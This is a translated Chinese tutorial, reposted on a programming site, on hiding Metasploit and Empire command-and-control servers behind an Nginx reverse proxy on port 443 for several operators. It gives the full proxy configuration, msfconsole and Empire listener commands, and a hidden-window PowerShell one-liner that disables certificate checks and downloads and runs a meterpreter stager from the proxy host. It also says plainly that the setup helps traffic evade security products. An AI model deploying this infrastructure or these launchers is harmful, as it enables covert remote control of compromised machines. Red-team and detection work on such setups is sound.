百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程网 > 正文

多工具多用户的HTTP代理 百度ai智能写作工具

yuyutoo 2024-10-11 23:57 1 浏览 0 评论

翻译:WisFree

预估稿费:200RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

基础知识

目前,很大一部分流行的命令控制(C&C)工具都是通过HTTP来传输网络通信数据的,例如Metasploit和Empire。对于C&C工具而言,之所以HTTP协议是一个更加高效的选择,主要是因为这个协议几乎适用于目前所有类型的通信网络以及网络设备。除此之外,使用“HTTP over TLS”可以为这些工具添加一个额外的安全层,因为这项技术将会使我们更加难以去检测到C&C流量。如果企业或组织拥有一个配置正确的Web代理,那么这个能够执行SSL/TLS检查的代理将会帮助安全技术人员更好地检测C&C流量。但是在我所帮助测试过的组织中,并没有多少组织采取了这样的安全措施。

为了掩饰所有的非法操作,通过HTTP协议传输的C&C流量应该通过80端口或者443端口来发送。如果使用类似8080这样的特殊端口来发送C&C数据的话,不仅会引起管理员怀疑,而且也逃不过安全防护软件的检测。就我个人而言,我喜欢在同一台主机中使用多种类型的工具。如果我要在一台主机中同时使用Empire和Metasploit的网络传输模块,我将总共需要三个网络端口,一般来说我会选择使用80端口、8080端口、以及443端口。但是现在,我想要让所有的网络流量全部通过端口443来发送。因此,我现在就要使用Sword&Shield所提供的安全分析服务了,这样我就可以使用一个C&C代理来完成所有的分析操作。

接下来,我打算使用Nginx来搭建一个反向代理服务器。如下图所示,这样我们就可以使用一台Web服务器来同时处理多用户-多工具的情况了。当代理服务器配置完成之后,代理规则将会负责对发送至C2服务器端口的流量进行划分。除此之外,这样的配置也可以隐藏C&C服务器的“真实身份”(实际主机)。Nginx不仅安装和配置非常简单,而且操作起来也非常便捷。多用户-多工具的C&C代理架构图如下图所示:

Nginx的安装与配置

首先,将你最喜欢的Linux发行版安装至一台VPS服务器中,你愿意的话也可以将其安装在自己的服务器里。为了方便大家理解,我选择将Ubuntu 16.10安装在一台VPS主机中。如果各位同学在Nginx的安装和运行上遇到了困难的话,可以参阅这份教程[教程获取]。通过配置之后,我的服务器仅启用了80端口,并且只允许网络流量通过443端口来发送。

在测试开始之前,我们一定要将Nginx配置好,否则代理服务器将会不知道如何去处理那些通信连接。为了防止暴力破解攻击,我们要为每一个分析器分配一个GUID。你可以点击这里来生成相应的GUID。我所生成的GUID如下表所示:

我总共设置了三个分析器,每一个分析器的相关配置信息如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#Analyst 1
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/ {
proxy_redirect off;
#Empire
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/ {
proxy_pass https://205.232.71.92:443;
}
#Metasploit
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/ {
#Metasploit exploit/multi/script/web_delivery
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery {
proxy_pass https://205.232.71.92:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned {
proxy_pass https://205.232.71.92:80;
}
}
}
#Analyst 2
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/ {
proxy_redirect off;
#Empire
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/e/ {
proxy_pass https://1.2.3.5:443;
}
#Metasploit
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ {
#Metasploit exploit/multi/script/web_delivery
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery {
proxy_pass https://1.2.3.5:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned {
proxy_pass https://1.2.3.5:80;
}
}
}
#Analyst 3
location /6012A46E-C00C-4816-9DEB-7B2697667D92/ {
proxy_redirect off;
#Empire
location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ {
proxy_pass https://1.2.3.6:443;
}
#Metasploit
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ {
#Metasploit exploit/multi/script/web_delivery
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery {
proxy_pass https://1.2.3.6:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned {
proxy_pass https://1.2.3.6:80;
}
}
}

由于我们要让Nginx需要区分出Metasploit和Empire的请求,所以我突发奇想,打算用‘m’来代表Metasploit,用‘e’来代表Empire。Empire的C2请求如下所示:

1
https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp

现在,既然我们已经可以确定传入的HTTP请求所使用的语句了,那么Nginx就需要将每一个请求转发至适当的分析代理服务器中,这项操作可以使用Nginx配置文件(/etc/nginx/sites-enabled/default)中的定位指令来完成。在这篇文章中,我们要为每一个分析器分别设置四个定位指令。在上面这段代码中,最外层的指令将会与分析器的GUID进行匹配。内层的定位指令主要用来匹配针对特定工具的请求,例如‘e’(Empire)和‘m’(Metasploit)。Metasploit的定位指令包含两个子定位指令,这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求。

现在,C&C代理服务器应该配置完成并且可以正常运行了。如果配置无误的话,我们将只能使用TLS连接和端口443来与服务器进行通信。

Metasploit的安装与配置

众所周知,Metasploit提供了很多的功能模块,我们可以使用这些模块来与目标用户的计算机建立C2连接。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher。我之所以非常喜欢这个模块,主要是因为它可以将meterpreter(ShellCode)注入至目标主机的内存中。这是一种非常理想的情况,因为你可以直接使用目标主机中的内置工具来进行操作,而不必向目标主机发送任何的文件。

接下来,我们要加载Nginx配置文件所需要使用的Metasploit模块,并使用URIPATH来对其进行设置。需要注意的是,自带的payload handler必须被禁用,因为我们要单独配置这些payload。在配置这个模块的过程中,payload使用的是“windows/x64/meterpreter/reverse_https”,然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号。请注意,这里可千万不要设置成后台C2服务器的IP地址了。除此之外,我们还要设置与payload(例如Pwned)和Nginx中的指令相匹配的LURI。虽然相应的监听器根本不会启动,但我们仍然要去配置这些payload。因为接下来当模块被执行之后,我们要使用这些设置来生成显示在屏幕中的启动命令。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块:

1
2
3
4
5
6
7
8
9
10
use exploit/multi/script/web_delivery
set URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery
set DisablePayloadHandler true
set SSL True
set TARGET 2
set payload windows/x64/meterpreter/reverse_https
set LHOST myc2proxy.com
set LPORT 443
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
run –j

下图显示的是Metasploit中web_delivery模块的配置信息:

当模块被执行后,屏幕中会显示一个包含有启动代码的字符串。请注意:必须将网络端口由8080改为443,否则之后将无法再进行修改了。除此之外,我们还必须手动去修改,因为我们的C2代理只会接受来自端口443的通信请求。这个字符串如下所示:

1
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');

接下来,将LHOST设置为0.0.0.0,LPORT设置为80(端口号的设置可以根据后台C2服务器来选择)。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块:

1
2
3
4
5
6
7
8
9
10
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 80
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
set OverrideLHOST myc2proxy.com
set OverrideLPORT 443
set OverrideRequestHost true
set ExitOnSession false
run –j

下图显示的是reverse_https的payload配置信息:

Empire的安装与配置

虽然Empire是我最喜欢的一款工具,但是在配置代理服务器的过程中,使用Empire之前还是有几个障碍需要克服的,相比之下Metasploit的配置和使用就简单多了。在PowerShell v1中,初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的。在我看来,我们是无法在Empire CLI中修改这部分数据的,所以我们必须直接手动修改数据库。但是,PowerShell Empire v2并没有使用这种架构。我建议各位同学使用git来下载Empire v2分支,命令如下:

1
cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git

下载完成之后,启动应用。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同,所以Empire必须使用端口443和HTTPS协议。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器:

1
2
3
4
5
6
7
8
9
listeners
uselistener http
set DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Gecko
set Name EmpireC2
set CertPath /opt/Empire/data/empire.pem
set Host https://myc2proxy.com
set Port 443
execute
launcher powershell

Empire监听器的配置信息如下图所示:

执行

现在,我们已经为Nginx C2代理配置好了一个用于分析数据流量的后台C2服务器了。接下来,我们要在测试主机中执行我们所生成的其中一个launcher,你将会在后台C2服务器中看到测试主机的shell。为了增加安全措施,配置后台C2服务器只允许当前C2代理访问。

结论

代理可以用来保持后台服务的匿名性。当你需要在某个网络中进行命令控制活动时,代理所提供的这种特性是非常有用的。由于HTTPS的通信数据足够安全,因此现在越来越多的网络都开始使用HTTPS来进行通信了。但是,这也将有助于我们躲避安全产品的检测。

相关推荐

jQuery VS AngularJS 你更钟爱哪个?

在这一次的Web开发教程中,我会尽力解答有关于jQuery和AngularJS的两个非常常见的问题,即jQuery和AngularJS之间的区别是什么?也就是说jQueryVSAngularJS?...

Jquery实时校验,指定长度的「负小数」,小数位未满末尾补0

在可以输入【负小数】的输入框获取到焦点时,移除千位分隔符,在输入数据时,实时校验输入内容是否正确,失去焦点后,添加千位分隔符格式化数字。同时小数位未满时末尾补0。HTML代码...

如何在pbootCMS前台调用自定义表单?pbootCMS自定义调用代码示例

要在pbootCMS前台调用自定义表单,您需要在后台创建表单并为其添加字段,然后在前台模板文件中添加相关代码,如提交按钮和表单验证代码。您还可以自定义表单数据的存储位置、添加文件上传字段、日期选择器、...

编程技巧:Jquery实时验证,指定长度的「负小数」

为了保障【负小数】的正确性,做成了通过Jquery,在用户端,实时验证指定长度的【负小数】的方法。HTML代码<inputtype="text"class="forc...

一篇文章带你用jquery mobile设计颜色拾取器

【一、项目背景】现实生活中,我们经常会遇到配色的问题,这个时候去百度一下RGB表。而RGB表只提供相对于的颜色的RGB值而没有可以验证的模块。我们可以通过jquerymobile去设计颜色的拾取器...

编程技巧:Jquery实时验证,指定长度的「正小数」

为了保障【正小数】的正确性,做成了通过Jquery,在用户端,实时验证指定长度的【正小数】的方法。HTML做成方法<inputtype="text"class="fo...

jquery.validate检查数组全部验证

问题:html中有多个name[],每个参数都要进行验证是否为空,这个时候直接用required:true话,不能全部验证,只要这个数组中有一个有值就可以通过的。解决方法使用addmethod...

Vue进阶(幺叁肆):npm查看包版本信息

第一种方式npmviewjqueryversions这种方式可以查看npm服务器上所有的...

layui中使用lay-verify进行条件校验

一、layui的校验很简单,主要有以下步骤:1.在form表单内加上class="layui-form"2.在提交按钮上加上lay-submit3.在想要校验的标签,加上lay-...

jQuery是什么?如何使用? jquery是什么功能组件

jQuery于2006年1月由JohnResig在BarCampNYC首次发布。它目前由TimmyWilson领导,并由一组开发人员维护。jQuery是一个JavaScript库,它简化了客户...

django框架的表单form的理解和用法-9

表单呈现...

jquery对上传文件的检测判断 jquery实现文件上传

总体思路:在前端使用jquery对上传文件做部分初步的判断,验证通过的文件利用ajaxFileUpload上传到服务器端,并将文件的存储路径保存到数据库。<asp:FileUploadI...

Nodejs之MEAN栈开发(四)-- form验证及图片上传

这一节增加推荐图书的提交和删除功能,来学习node的form提交以及node的图片上传功能。开始之前需要源码同学可以先在git上fork:https://github.com/stoneniqiu/R...

大数据开发基础之JAVA jquery 大数据java实战

上一篇我们讲解了JAVAscript的基础知识、特点及基本语法以及组成及基本用途,本期就给大家带来了JAVAweb的第二个知识点jquery,大数据开发基础之JAVAjquery,这是本篇文章的主要...

推荐四个开源的jQuery可视化表单设计器

jquery开源在线表单拖拉设计器formBuilder(推荐)jQueryformBuilder是一个开源的WEB在线html表单设计器,开发人员可以通过拖拉实现一个可视化的表单。支持表单常用控件...

取消回复欢迎 发表评论: